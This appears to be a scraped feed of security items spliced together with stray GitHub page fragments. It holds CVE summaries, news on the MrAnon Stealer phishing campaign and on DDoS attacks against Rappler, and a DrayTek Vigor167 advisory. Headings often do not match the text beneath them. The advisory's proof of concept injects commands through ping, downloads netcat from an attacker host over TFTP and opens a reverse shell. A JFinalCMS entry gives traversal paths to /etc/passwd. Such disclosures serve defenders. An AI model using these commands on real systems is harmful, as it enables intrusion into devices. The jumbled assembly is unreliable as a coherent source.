Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS.

**Cross-site Scripting in Semantic MediaWiki**

Moderate severity GitHub Reviewed Published Dec 10, 2023 to the GitHub Advisory Database • Updated Dec 11, 2023

GHSA-hj4c-vfc4-5f9c: Cross-site Scripting in Semantic MediaWiki

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

Additional navigation options

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Labels

bug

Occurrence of an unintended or unanticipated behaviour that causes a vulnerability or fatal error

CVE-2022-48614: Possible Reflected XSS vulnerability in Special:Ask · Issue #5262 · SemanticMediaWiki/SemanticMediaWiki

By Waqas
Received an email about a hotel reservation you didn't book? It's likely a phishing attempt delivering the MrAnon Stealer malware.
This is a post from HackRead.com Read the original post: Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

MrAnon Stealer is capable of stealing data and gathering information from cryptocurrency wallets, browsers, messaging apps and VPN clients.

Cybersecurity researchers at FortiGuard Labs have brought to light a new email phishing campaign exploiting false hotel reservations to lure unsuspecting victims. The phishing attack involves the deployment of a malicious PDF file that, once opened, unleashes a chain of events leading to the activation of the MrAnon Stealer malware.

Rather than relying on complex technical details, the attackers cunningly pose as a hotel reservation company, sending phishing emails under the subject, “December Room Availability Query.” The email body contains fabricated holiday season booking details, with the malicious PDF file hiding a downloader link.

The phishing email (Screenshot credit: Fortinet Labs)

Upon closer inspection, cybersecurity experts at FortiGuard Labs uncovered a multi-stage process involving .NET executable files, PowerShell scripts, and deceptive Windows Form presentations. The attackers, posing as a hotel reservation company, skillfully navigate through these stages, using tactics like false error messages to cloak the successful execution of the malware.

The MrAnon Stealer, a Python-based infostealer, operates discreetly, compressing its activities with cx-Freeze to slip past detection mechanisms. The malware executes a meticulous process that includes capturing screenshots, retrieving IP addresses, and stealing sensitive data from various applications.

The attackers demonstrate sophistication by terminating specific processes on the victim’s system and masquerading as legitimate connections to fetch IP addresses, country names, and country codes. The stolen data, including credentials, system information, and browser sessions, is compressed, secured with a password, and uploaded to a public file-sharing website.

According to FortiGuard Labs’ blog post, MrAnon Stealer can gather information from cryptocurrency wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. Additionally, it targets VPN clients like NordVPN, ProtonVPN, and OpenVPN Connect.

As for its command and control; the attackers use the Telegram channel as a communication medium. The stolen data, system information, and a download link are sent to the attacker’s Telegram channel using a bot token.

MrAnon Stealer on Telegram and its prices & packages for other cybercriminals (Screenshot credit: Fortinet Labs)

This campaign, active and aggressive during November 2023, primarily targeted Germany, as indicated by the surge in queries for the downloader URL during that period. The cybercriminals behind this operation have exhibited a strategic approach, shifting from Cstealer in July and August to the more potent MrAnon Stealer in October and November.

If you are online, you are vulnerable. Therefore, users are advised to exercise caution when dealing with unexpected emails, especially those containing dubious attachments. Cautiousness and commonsense are keys to thwarting cybercriminals’ attempts to exploit human vulnerabilities and compromise online security.

****_RELATED ARTICLES_****

1.  **Booking.com Scam Targeting Guests with Vidar Infostealer**
2.  **Silent Ransom Group Utilizes Callback Phishing for Network Hacks**
3.  **USPS Delivery Phishing Scam Exploits SaaS Providers to Steal Data**
4.  **Iran’s MuddyWater Group Hits Israelis with Fake Memo Spear-Phishing**
5.  **LinkedIn Phishing Scam Exploits Smart Links to Steal Microsoft Accounts**

Fake hotel reservation phishing scam uses PDF links to spread MrAnon Stealer

JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.

在/common/down/file路由功能下，可以对参数fileKey设计带有恶意性质内容的文件名实现目录穿越，从而下载已知目录内的任意已知文件名，且该行为并不需要进行登录。

    poc:
    Linux:   /../../../../../../../etc/passwd
    Windows:  /../../../../../../../test.txt （test.txt为测试用的在根目录下的文件）

CVE-2023-50449: JFinalCMS存在未授权目录遍历漏洞 · Issue #I7WGC6 · 樱木/JFinalCMS - Gitee.com

sec_attest_info in drivers/accel/habanalabs/common/habanalabs_ioctl.c in the Linux kernel through 6.6.5 allows an information leak to user space because info->pad0 is not initialized.

**Xingyuan Mo** hdthky0 at gmail.com  
_Wed Nov 22 10:49:40 UTC 2023_

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

This function may copy the pad0 field of struct hl\_info\_sec\_attest to
user mode which has not been initialized, resulting in leakage of kernel
heap data to user mode. To prevent this, just zero out the pad0 field
before copying it to user mode.

Fixes: 0c88760f8f5e ("habanalabs/gaudi2: add secured attestation info uapi")
Signed-off-by: Xingyuan Mo <hdthky0 at gmail.com\>
---
 drivers/accel/habanalabs/common/habanalabs\_ioctl.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
index 8ef36effb95b..9e3feb7ad5e5 100644
--- a/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
+++ b/drivers/accel/habanalabs/common/habanalabs\_ioctl.c
@@ -707,6 +707,7 @@ static int sec\_attest\_info(struct hl\_fpriv \*hpriv, struct hl\_info\_args \*args)
 	memcpy(&info->public\_data, &sec\_attest\_info->public\_data, sizeof(info->public\_data));
 	memcpy(&info->certificate, &sec\_attest\_info->certificate, sizeof(info->certificate));
 	memcpy(&info->quote\_sig, &sec\_attest\_info->quote\_sig, sizeof(info->quote\_sig));
+	memset(&info->pad0, 0, sizeof(info->pad0));
 
 	rc = copy\_to\_user(out, info,
 				min\_t(size\_t, max\_size, sizeof(\*info))) ? -EFAULT : 0;
-- 
2.43.0

*   Previous message (by thread): \[PATCH\] drm/i915/psr: Fix unsigned expression compared with zero
*   Next message (by thread): \[PATCH\] drm/amdgpu: Fix cat debugfs amdgpu\_regs\_didt causes kernel null pointer
*   **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the dri-devel mailing list

CVE-2023-50431: [PATCH] habanalabs: fix information leak in sec_attest_info()

The Goodix Fingerprint Device, as shipped in Dell Inspiron 15 computers, does not follow the Secure Device Connection Protocol (SDCP) when enrolling via Linux, and accepts an unauthenticated configuration packet to select the Windows template database, which allows bypass of Windows Hello authentication by enrolling an attacker's fingerprint.

CVE-2023-50430: A Touch of Pwn - Part I

In Bitcoin Core through 26.0 and Bitcoin Knots before 25.1.knots20231115, datacarrier size limits can be bypassed by obfuscating data as code (e.g., with OP_FALSE OP_IF), as exploited in the wild by Inscriptions in 2022 and 2023.

CVE-2023-50428: Common Vulnerabilities and Exposures - Bitcoin Wiki

SyncTrayzor 1.1.29 enables CEF (Chromium Embedded Framework) remote debugging, allowing a local attacker to control the application.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-46899: Remove RemoteDebuggingPort for release builds · Issue #666 · canton7/SyncTrayzor

By Waqas
On Thursday, November 30, 2023, Rappler, the prominent online media giant based in the Philippines, fell victim to a relentless series of Distributed Denial of Service (DDoS) attacks.
This is a post from HackRead.com Read the original post: DDoS Attacks on Rappler Linked to Proxy Service Providers in US and Russia

Qurium, the Swedish media foundation and human rights watchdog leading the investigation into these DDoS attacks implicates FineProxy and RayoByte in facilitating the attacks.

On November 30, 2023, Rappler, the leading digital media company in the Philippines, found itself under a massive series of crippling DDoS attacks (Distributed Denial of Service Attacks).

Qurium, the Swedish media foundation and human rights watchdog, leading the investigation into the recent DDoS attacks, has exposed the alleged participation of two major proxy providers, FineProxy and RayoByte, in facilitating the series of crippling DDoS attacks.

In a blog post published by Rappler, On December 5, 2023, the company experienced an unprecedented surge of over 40 million requests to its homepage within a span of one hour. The investigation, conducted by Qurium, analyzed 90GB of access log data provided by Rappler and traced the malicious activity back to FineProxy and RayoByte.

****FineProxy from Russia****

According to a report published by Qurium, FineProxy, a Russian-based proxy infrastructure, has a history of involvement in numerous DDoS attacks against various organizations.

Despite being approached multiple times by Qurium, FineProxy showed little interest in resolving the issue and instead offered to disclose the client responsible for the attacks on the condition that Qurium remove all forensic reports involving their name.

For a comprehensive understanding of the details provided in the screenshot above, delve into Qurium’s report outlining FineProxy’s infrastructure and a documented timeline of its business model.

****RayoByte from the United States****

RayoByte, based in Nebraska and operating under Sprious LLC, claims to be an “ethical proxy provider.” However, evidence collected by Qurium suggests otherwise, as the investigation revealed the use of fake geolocations in their networks and a willingness to engage in unethical practices.

It is worth noting that during the DDoS attack on Rappler, traffic peaked at a staggering 250,000 requests per second. The assailants targeted Rappler’s website with multiple waves of attacks, originating from both residential and data center connections.

Qurium’s investigation exposed the complex web of networks associated with FineProxy and RayoByte. Both proxy providers, despite claims of ethical standards, have allegedly tampered with geolocation data, associating their networks with fake locations to attract clients.

The alleged fake locations advertised by RayoByte (Screenshot taken from a separate report published by Qurium available here.

The report concludes that both FineProxy and RayoByte have designed their infrastructures to accommodate almost unlimited connections, enabling customers to automate tasks such as scraping and flooding sites with backlinks at high speeds. This focus on serving clients engaging in potentially abusive SEO practices has led to the use of their infrastructures for conducting DDoS attacks.

****Qurium****

For readers’ information, Qurium specializes in investigating DDoS attacks with a mission to identify perpetrators and ensure accountability. The organization has been actively investigating the recent surge in DDoS attacks targeting media and human rights organizations in the Philippines.

Qurium’s noteworthy track record includes investigations into significant cyber incidents. This includes their examination of weeks-long DDoS attacks on the Philippines Human Rights watchdog ‘Karapatan.’

In November 2023, Qurium exposed Chinese scammers exploiting cloned websites within an extensive gambling network. Furthermore, in September 2019, the organization released a report shedding light on how an illegal prostitution ring disrupted the Internet in Kazakhstan.

Nevertheless, the troubling findings call into question the responsibility and moral guidelines of proxy providers, which seem to shield users involved in harmful actions. The disclosures concerning the absence of supervision and accountability among these providers are troubling, provoking deep concerns about their function in protecting the Internet.

1.  **List of Proxy IPs Exposed to Block Killnet’s DDoS Bots**
2.  **Cloudflare thwarts largest reported HTTP DDoS attack**
3.  **48 DDoS-hiring Services Busted by FBI in Major Sweep**
4.  **UK Royal Family Website Hit by DDoS Attack from Russian KillNet**
5.  **Kaspersky Reveals Alarming IoT Threats and Dark Web DDoS Boom**
6.  **Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**

DDoS Attacks on Rappler Linked to Proxy Service Providers in US and Russia

An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Fabian Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see \[1\]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (\`\`). The current working directory can be printed out with the following command: vigor> exec ping \`pwd\` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat\[2\] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping \`busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping \`chmod${IFS}+x${IFS}/tmp/netcat\` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping \[OPTION\]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping \`/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash\` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Vigor167 https://www.draytek.com/products/vigor167 \[2\] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat \[3\] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt \[4\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Fabian Krone of SySS GmbH. E-Mail: fabian.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian\_Krone.asc Key ID: 0xBFDF30ABD10EA0F4 Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEECt7Sqq4nfdqo8MBRv98wq9EOoPQFAmVouRMACgkQv98wq9EO oPRkjhAAnkZCXYM9lqXIbN+pGZoA2Zv93z8JXv34vIhCahv1G47ocJ0L7kLb7KNz +EbLTEnoh9Kxukw7tjNV6zvHRhav2o5KQBaelgGyCAmgtcKp30eCkN0sO4ocBqm5 wBYbYxVzOk6+aMOxIR6B496lT5AvFtzHXeCuwm4Vewpv/v7L78ixA1vnD+cjJuHq BdA/IYxrQKUEeZBlBqNM1WFe2AUxhaxGnskBrQtnZcblrJwLj3CY4UCbAehFCN29 p0iw6ntnMfpSP85nwM7mNIQo1UFWvA3Dnx6sVK7LjokX+bBAgrjjklxUdZoN1exa htT12p6lE9UNWteFt0xkgdMRkTM48CUsDpiQORIRTbb20Haz9byNTieH3UxX/OLE mU/D/BhfX4F55f0Yxlz/kJ+5hLEv4EUUIfuM4uM6vntH1E8Y/FGMxdpWVqtvCU64 U6mr52/ZLWKxyyp1+qZn2UpkP9zntO8sNUd2Yt3TqpNfOydJGNff//A5gqPkJy6B s1bZEYNWN6zpkkVukFT+EIjQHyA8OaTud8TUmo0uuvN240S74yqKpb7czaAjdOwn c5h6IlqEYu70lpnEc2d9UFRN4nGJ/NiLuimDbFjaqtjzGa+rDFNNSHDvS8jN+tN5 bgZ6SPy+mXNh07dqET/SVaI8P/yIZmNIENtNrW7z6fbr6F+aKfk= =7izf -----END PGP SIGNATURE-----

Tag

#git